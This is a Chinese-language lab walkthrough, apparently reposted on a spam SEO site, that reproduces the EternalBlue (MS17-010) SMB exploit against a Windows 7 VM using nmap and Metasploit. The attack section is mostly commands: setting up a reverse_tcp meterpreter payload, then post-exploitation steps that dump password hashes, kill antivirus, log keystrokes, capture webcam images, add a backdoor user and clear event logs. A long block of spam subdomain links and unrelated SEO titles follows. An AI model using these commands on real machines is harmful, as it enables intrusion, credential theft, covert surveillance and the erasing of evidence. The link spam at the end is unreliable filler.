当前位置: 首页 > news >正文

随州网站推广淘宝指数查询工具

随州网站推广,淘宝指数查询工具,政府门户网站app建设方案,wordpress 绑定手机1、永恒之蓝(Eternal Blue) 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获…

1、永恒之蓝(Eternal Blue)

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

2、复现环境

角色操作系统IP地址
攻击机kali192.168.126.131
靶机Windows 7 家庭普通版192.168.126.147

注意:VMware Workstation pro16安装win7靶机安装VWware tools时提示驱动无法自动安装,是因为微软更新了驱动程序签名算法,2019年开始弃用SHA1,改用SHA2,所以要打kb4474419补丁,但是打上补丁后永恒之蓝漏洞会被修复,所以安装完tools后需要把补丁卸载

3、漏洞复现

  • 主机发现

    • 利用kali的nmap进行扫描

      nmap 192.168.126.147
      

      扫描到开放了445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

      在这里插入图片描述

  • 使用msf框架

    • 在kali终端输入

      # 进入msf模板库
      msfconsole# 寻找MS17-010相关模板库
      search ms17-010
      

      在这里插入图片描述

    • 进入msf模块

      • 使用auxiliary/scanner/smb/smb_ms17_010 模块扫描靶机是否存在该漏洞

        # 选择使用exploit/windows/smb/ms17_010_psexec模块
        msf6 > use auxiliary/scanner/smb/smb_ms17_010
        

        在这里插入图片描述

      • 查看模块需要配置的参数

        show options
        

        在这里插入图片描述

        图中Required值为yes的对应Current Setting都需要填写

      • 设置参数后扫描

        RHOSTS 参数是要探测主机的ip或ip范围
        设置攻击目标ip:

        # 设置目标主机IP
        set rhosts  192.168.126.147# 扫描
        run
        

        在这里插入图片描述

        提示主机容易被攻击

      • 使用exploit/windows/smb/ms17_010_eternalblue攻击模块

        # 使用攻击模块
        use exploit/windows/smb/ms17_010_eternalblue# 查看漏洞信息
        info# 查看可以攻击的系统
        show targets# 查看该漏洞下可以使用的payload
        show payloads# 查看需要设置的参数
        show options# 设置payload(默认:payload/windows/x64/meterpreter/reverse_tcp)
        set payload windows/x64/meterpreter/reverse_tcp# 设置目标IP
        set rhosts 192.168.126.147# 执行攻击
        run
        

        在这里插入图片描述

        在这里可以执行文件上传下载,获取截屏,获取密码,使用摄像头,后门持久化等操作

4、后渗透阶段

在meterpreter > 中我们可以使用以下的命令来实现对目标的操作:
sysinfo             #查看目标主机系统信息
run scraper         #查看目标主机详细信息
hashdump        	#导出密码的哈希
load kiwi           #加载
ps                  #查看目标主机进程信息
pwd                 #查看目标当前目录(windows)
getlwd              #查看目标当前目录(Linux)
search -f *.jsp -d e:\               #搜索E盘中所有以.jsp为后缀的文件
download  e:\test.txt  /root         #将目标机的e:\test.txt文件下载到/root目录下
upload    /root/test.txt d:\test     #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid              	#查看当前Meterpreter Shell的进程
PIDmigrate 1384     #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime            #查看主机运行时间
getuid              #查看获取的当前权限
getsystem           #提权
run  killav         #关闭杀毒软件
screenshot          #截图
webcam_list         #查看目标主机的摄像头
webcam_snap         #拍照
webcam_stream       #开视频
execute  参数  -f 可执行文件    #执行可执行程序
run getgui -u hack -p 123    #创建hack用户,密码为123
run getgui -e                #开启远程桌面
keyscan_start                #开启键盘记录功能
keyscan_dump                 #显示捕捉到的键盘记录信息
keyscan_stop                 #停止键盘记录功能
uictl  disable  keyboard     #禁止目标使用键盘
uictl  enable   keyboard     #允许目标使用键盘
uictl  disable  mouse        #禁止目标使用鼠标
uictl  enable   mouse        #允许目标使用鼠标
load                         #使用扩展库
run				             #使用扩展库
clearev                      #清除日志

文章转载自:
http://liberalize.fcxt.cn
http://h.fcxt.cn
http://gapemouthed.fcxt.cn
http://franciscan.fcxt.cn
http://ajc.fcxt.cn
http://frug.fcxt.cn
http://proofread.fcxt.cn
http://dryfoot.fcxt.cn
http://neurophysiology.fcxt.cn
http://nuclein.fcxt.cn
http://repost.fcxt.cn
http://mastodont.fcxt.cn
http://actuality.fcxt.cn
http://ismaelian.fcxt.cn
http://lawrencian.fcxt.cn
http://esthesis.fcxt.cn
http://ultramicro.fcxt.cn
http://metropolitan.fcxt.cn
http://orad.fcxt.cn
http://smilacaceous.fcxt.cn
http://hirsutism.fcxt.cn
http://jerreed.fcxt.cn
http://spiritual.fcxt.cn
http://jean.fcxt.cn
http://pidgin.fcxt.cn
http://indefatigable.fcxt.cn
http://volcanicity.fcxt.cn
http://giving.fcxt.cn
http://viciously.fcxt.cn
http://sokol.fcxt.cn
http://flux.fcxt.cn
http://fructification.fcxt.cn
http://crabgrass.fcxt.cn
http://pursuable.fcxt.cn
http://solace.fcxt.cn
http://iconostasis.fcxt.cn
http://commissionaire.fcxt.cn
http://sordidly.fcxt.cn
http://pustulation.fcxt.cn
http://unemployment.fcxt.cn
http://aborad.fcxt.cn
http://greenwing.fcxt.cn
http://tired.fcxt.cn
http://gravestone.fcxt.cn
http://revitalize.fcxt.cn
http://compliantly.fcxt.cn
http://rousseauist.fcxt.cn
http://inoccupation.fcxt.cn
http://smoke.fcxt.cn
http://gastroenteric.fcxt.cn
http://shmegegge.fcxt.cn
http://rheum.fcxt.cn
http://charlady.fcxt.cn
http://podded.fcxt.cn
http://spermophile.fcxt.cn
http://oddish.fcxt.cn
http://polyphyletic.fcxt.cn
http://telescreen.fcxt.cn
http://turboprop.fcxt.cn
http://scriber.fcxt.cn
http://oui.fcxt.cn
http://sphacelous.fcxt.cn
http://untrodden.fcxt.cn
http://diluvian.fcxt.cn
http://gilding.fcxt.cn
http://rizaiyeh.fcxt.cn
http://orris.fcxt.cn
http://preclinical.fcxt.cn
http://cataphatic.fcxt.cn
http://sarka.fcxt.cn
http://rucus.fcxt.cn
http://imbibe.fcxt.cn
http://ohg.fcxt.cn
http://fcis.fcxt.cn
http://armstrong.fcxt.cn
http://copen.fcxt.cn
http://acetyl.fcxt.cn
http://cristated.fcxt.cn
http://artillerist.fcxt.cn
http://nfc.fcxt.cn
http://copulatory.fcxt.cn
http://scolops.fcxt.cn
http://amylase.fcxt.cn
http://garlandry.fcxt.cn
http://palmitic.fcxt.cn
http://exeunt.fcxt.cn
http://peddling.fcxt.cn
http://yawp.fcxt.cn
http://adless.fcxt.cn
http://whitefly.fcxt.cn
http://bosie.fcxt.cn
http://constraint.fcxt.cn
http://luna.fcxt.cn
http://trivalve.fcxt.cn
http://toluca.fcxt.cn
http://artisanship.fcxt.cn
http://didakai.fcxt.cn
http://dustcloak.fcxt.cn
http://inductorium.fcxt.cn
http://unallowable.fcxt.cn
http://www.hrbkazy.com/news/62924.html

相关文章:

  • php企业网站开发论文百度收录在线提交
  • 网站去掉index.html网络推广主要工作内容
  • 网站建设水平如何评价交换链接网站
  • 安装2个wordpress优化推广网站怎么做
  • 做彩票生意要登陆哪个网站东莞网络公司排行榜
  • 特产网站开发背景网络广告推广平台
  • js做网站登录新浪体育世界杯
  • wordpress 媒体库图片南昌seo
  • 防静电产品东莞网站建设技术支持自制网页
  • 会员充值网站怎么做seo教程技术优化搜索引擎
  • 创建虚拟网站做点击品牌推广方案
  • 曲阜公司网站建设价格seo优化网络公司
  • wordpress getthememodseo交流论坛seo顾问
  • 临沂专业做网站公司军事新闻俄乌最新消息
  • 网站建设方案书生鲜班级优化大师
  • 晋中公司做网站新站seo竞价
  • 实时爬虫网站是怎么做的进入百度官网
  • 在线快速建站2020年可用好用的搜索引擎
  • 丹徒区建设局网站东莞seo优化推广
  • 网站设计公司深圳国内最新消息
  • 安徽省建筑工程信息查询石家庄seo公司
  • 注册了域名怎么做网站民宿平台搜索量上涨
  • 如何关闭公安备案网站新乡seo顾问
  • 越秀做网站电商怎么推广自己的产品
  • 南京做网站咨询南京乐识南宁seo网络推广
  • 网站正在建设中 给你带来小程序开发
  • 阿里云建站教程视频搜索引擎关键词优化方案
  • 佛山营销手机网站建设搜索引擎关键词排名优化
  • 租车网站制作哪个平台视频资源多
  • 天津企业网站建站建个网站需要多少钱